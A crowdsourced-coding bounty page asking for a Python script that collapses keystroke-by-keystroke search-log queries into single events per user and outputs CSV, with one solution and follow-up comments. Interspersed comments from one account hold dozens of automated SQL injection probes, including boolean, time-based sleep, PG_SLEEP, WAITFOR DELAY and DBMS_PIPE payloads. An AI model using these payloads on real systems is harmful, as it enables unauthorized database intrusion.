Search log aggregation utility (python)
New here? Learn about Bountify and follow @bountify to get notified of new bounties! x

I have a search engine for a document mgmt system and it logs what people search for so we can do analytics on it later. As a part of this we log the incoming queries which end up being a lot of redundant data since the client side debounce waits for pauses. So slow typers end up executing a queries for a lot of keystrokes and it ends up messy on the analytics side. I am looking to get a working python script that will take json data as seen here https://gist.github.com/quotient/7bddb455ab75bcd17fc50f46a0f26745

And output a tabular dataset that we can store in a common sql table. For the purpose of the bounty you can just output a csv. We can use https://replit.com/ for getting your bounty working. You can presume the json file is local to your code and then we run your code and it outputs something like output.csv I have modeled the output table here for us https://docs.google.com/spreadsheets/d/1FpfnvNsYuJe1yHAL-uxdrVGuA-XXGlnfVJ0wScn79VM/edit?usp=sharing we can keep a lot of the fields. A couple notes. We did a project a while back to collapse similar branch terms to single "root" instances https://wuddrum.github.io/collapse-words/ you might find utility with this even though its in js. You can read about this bounty here https://bountify.co/collapse-list-of-words-to-get-unique-root-spellings-javascript as you can see it was solving a different issue but was great at collapsing terms. Essentially the issue is if we have entries like

I

I am

I am sear

I am searching

I am searching f

I am searching for something

We need to be able to collapse all of these queries in to a single event like

I am searching for something {timestamp}

Now we can confidently say if we see this in the logs in ~5 seconds that it should be collapsed to a single envet. If we see it like “I am searching” then we see 30 second pause and then they keep typing to get “I am searching for something “ we might want to consider that two searches. My thought is that maybe we have a threshold to consider. Time between entries (letters) before considering it a second search. It would be awesome if we could think of a way to make this dynamic so that maybe longer queries behave different than smaller ones but we might have to see the outcome of a simple threshold before we get fancy.

Now we need to make sure we scope our aggregation to be the same user within the same time (roughly speaking) and ideally would be smart to catch someone that searched a term. The way we need to think of user is UserID + Portal_ID+username+customer_name.. This way we can be sure we dont aggregate something across customers wrongly.

Last detail, you can find the search term in the field called “eventType”

One other use case we want to make sure is covered in the above logic. Suppose the user hits the backspace and the search term gets smaller like

I am searching

I am searchi

If our timestamps are to be trusted we should assume the user is working on an updated search so we would see this as starting a new search even though it would technically collapse to the same aggregated term. Here is a good view of that

Now let’s look at something more complicated. Suppose we have these searches
I

I am

I am sear

I am searching

I am

I am here

This should be aggregated to 2 final searches

I am searching

I am here

Hope this makes sense, please ask questions

So if i'm reading this correctly, you want a script that takes a json file, and outputs csv file while aggregating any similar information?
Edgy 9 months ago
Hi, just wanted to find out if my solution solved your problem? Thank you
Yellow Duckling 9 months ago
moVsUlKo
gbtagbbj 1 month ago
-1 OR 2+490-490-1=0+0+0+1
gbtagbbj 1 month ago
-1 OR 2+733-733-1=0+0+0+1 --
gbtagbbj 1 month ago
-1 OR 3+490-490-1=0+0+0+1
gbtagbbj 1 month ago
-1 OR 3+733-733-1=0+0+0+1 --
gbtagbbj 1 month ago
1 RLIKE (SELECT (CASE WHEN (386=386) THEN 1 ELSE 0x28 END)) --
gbtagbbj 1 month ago
-1 OR 2+91-91-1=0+0+0+1
gbtagbbj 1 month ago
-1 OR 3+91-91-1=0+0+0+1
gbtagbbj 1 month ago
-1' OR 2+735-735-1=0+0+0+1 --
gbtagbbj 1 month ago
-1' OR 3+735-735-1=0+0+0+1 --
gbtagbbj 1 month ago
if(now()=sysdate(),sleep(15),0)
gbtagbbj 1 month ago
-1' OR 2+160-160-1=0+0+0+1 or '4U7AuU13'='
gbtagbbj 1 month ago
-1' OR 3+160-160-1=0+0+0+1 or '4U7AuU13'='
gbtagbbj 1 month ago
-1" OR 2+687-687-1=0+0+0+1 --
gbtagbbj 1 month ago
-1" OR 3+687-687-1=0+0+0+1 --
gbtagbbj 1 month ago
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
gbtagbbj 1 month ago
if(now()=sysdate(),sleep(15),0)
gbtagbbj 1 month ago
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
gbtagbbj 1 month ago
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
gbtagbbj 1 month ago
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
gbtagbbj 1 month ago
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
gbtagbbj 1 month ago
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
gbtagbbj 1 month ago
1 waitfor delay '0:0:15' --
gbtagbbj 1 month ago
H1DvfQST'
gbtagbbj 1 month ago
1 waitfor delay '0:0:15' --
gbtagbbj 1 month ago
-5 OR 124=(SELECT 124 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
DxuXsKRy'
gbtagbbj 1 month ago
-5) OR 715=(SELECT 715 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
-5 OR 939=(SELECT 939 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
-1)) OR 358=(SELECT 358 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
-5) OR 705=(SELECT 705 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
fopObrxv' OR 775=(SELECT 775 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
-1)) OR 538=(SELECT 538 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
tCGN2MEM') OR 925=(SELECT 925 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
wqyaXwh0' OR 804=(SELECT 804 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
Q0Y72l3T')) OR 565=(SELECT 565 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
Qgb8EuLu') OR 121=(SELECT 121 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
1*DBMSPIPE.RECEIVEMESSAGE(CHR(99)||CHR(99)||CHR(99),15)
gbtagbbj 1 month ago
LT7PGaay')) OR 685=(SELECT 685 FROM PG_SLEEP(15))--
gbtagbbj 1 month ago
1'||DBMSPIPE.RECEIVEMESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
gbtagbbj 1 month ago
1*DBMSPIPE.RECEIVEMESSAGE(CHR(99)||CHR(99)||CHR(99),15)
gbtagbbj 1 month ago
'||(select 1 from (select pg_sleep(15))x)||'
gbtagbbj 1 month ago
1'||DBMSPIPE.RECEIVEMESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
gbtagbbj 1 month ago
''||(select 1 from (select pg_sleep(15))x)||''
gbtagbbj 1 month ago
'||(select 1 from (select pg_sleep(15))x)||'
gbtagbbj 1 month ago
''||(select 1 from (select pg_sleep(15))x)||''
gbtagbbj 1 month ago
RSCaH1Mp
gbtagbbj 30 days ago
-1 OR 2+617-617-1=0+0+0+1
gbtagbbj 30 days ago
-1 OR 3+617-617-1=0+0+0+1
gbtagbbj 30 days ago
RLIKE (SELECT (CASE WHEN (86=86) THEN 1 ELSE 0x28 END)) --
gbtagbbj 30 days ago
if(now()=sysdate(),sleep(15),0)
gbtagbbj 30 days ago
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
gbtagbbj 30 days ago
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
gbtagbbj 30 days ago
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
gbtagbbj 30 days ago
1 waitfor delay '0:0:15' --
gbtagbbj 30 days ago
Jjgrp6Du'
gbtagbbj 30 days ago
-5 OR 373=(SELECT 373 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
-5) OR 723=(SELECT 723 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
-1)) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
ZvI054cM' OR 298=(SELECT 298 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
8IinjNCz') OR 402=(SELECT 402 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
OdjtDKwe')) OR 537=(SELECT 537 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
*DBMSPIPE.RECEIVEMESSAGE(CHR(99)||CHR(99)||CHR(99),15)
gbtagbbj 30 days ago
'||DBMSPIPE.RECEIVEMESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
gbtagbbj 30 days ago
'||(select 1 from (select pg_sleep(15))x)||'
gbtagbbj 30 days ago
''||(select 1 from (select pg_sleep(15))x)||''
gbtagbbj 30 days ago
Tags
python

Crowdsource coding tasks.

1 Solution


I have written a solution in Python 3 that manages to perform the task required. It currently supports either no time span or a static time span between records that should be considered acceptable (e.g. 5 seconds). It seems to narrow down the number of records from 1900+ to 485 rows when using a 5 second timespan. This time span is configurable when you run the program. A summary is shown at the end of the aggregation which allows you to compare the effectiveness of different time thresholds. If you do want a dynamic time threshold we can take a look, however, from my testing with the sample data it appears that a static time aggregate works well.

The aggregated records are then outputted to a CSV file called output.csv according to your specifications.

You can find the code on Replit: https://replit.com/@ivankahl/SearchLogAggregation#main.py

Please let me know what you think and if you require any changes.

Sorry for the late reply I didn’t get a notification. I’ll check this tomorrow!
Qdev 9 months ago
Just wanted to check if this helped solve your problem?
Yellow Duckling 9 months ago
Hi, just following up to see if this solution matches your requirements?
Yellow Duckling 9 months ago
Hi, just wanted to find out if this solved your problem? Thanks!
Yellow Duckling 9 months ago
hey there, any chance you can modify the solution to have 2 more columns with a date time output like you see here - https://www.dropbox.com/s/bgf6ateokp2uear/2021-10-13_09-30-19.png?dl=0
Qdev 9 months ago
-1 OR 2+471-471-1=0+0+0+1 --
gbtagbbj 30 days ago
-1 OR 3+471-471-1=0+0+0+1 --
gbtagbbj 30 days ago
-1 OR 2+394-394-1=0+0+0+1
gbtagbbj 30 days ago
-1 OR 3+394-394-1=0+0+0+1
gbtagbbj 30 days ago
-1' OR 2+959-959-1=0+0+0+1 --
gbtagbbj 30 days ago
-1' OR 3+959-959-1=0+0+0+1 --
gbtagbbj 30 days ago
-1' OR 2+682-682-1=0+0+0+1 or 'JnMrEBmn'='
gbtagbbj 30 days ago
-1' OR 3+682-682-1=0+0+0+1 or 'JnMrEBmn'='
gbtagbbj 30 days ago
-1" OR 2+791-791-1=0+0+0+1 --
gbtagbbj 30 days ago
-1" OR 3+791-791-1=0+0+0+1 --
gbtagbbj 30 days ago
if(now()=sysdate(),sleep(15),0)
gbtagbbj 30 days ago
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
gbtagbbj 30 days ago
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
gbtagbbj 30 days ago
(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/
gbtagbbj 30 days ago
1 waitfor delay '0:0:15' --
gbtagbbj 30 days ago
f7poumJ3'
gbtagbbj 30 days ago
-5 OR 416=(SELECT 416 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
-5) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
-1)) OR 967=(SELECT 967 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
wkSYws8k' OR 382=(SELECT 382 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
aHYoQIvP') OR 477=(SELECT 477 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
ZElgI7sc')) OR 488=(SELECT 488 FROM PG_SLEEP(15))--
gbtagbbj 30 days ago
*DBMSPIPE.RECEIVEMESSAGE(CHR(99)||CHR(99)||CHR(99),15)
gbtagbbj 30 days ago
'||DBMSPIPE.RECEIVEMESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
gbtagbbj 30 days ago
'||(select 1 from (select pg_sleep(15))x)||'
gbtagbbj 30 days ago
''||(select 1 from (select pg_sleep(15))x)||''
gbtagbbj 30 days ago
&#x000A
gbtagbbj 30 days ago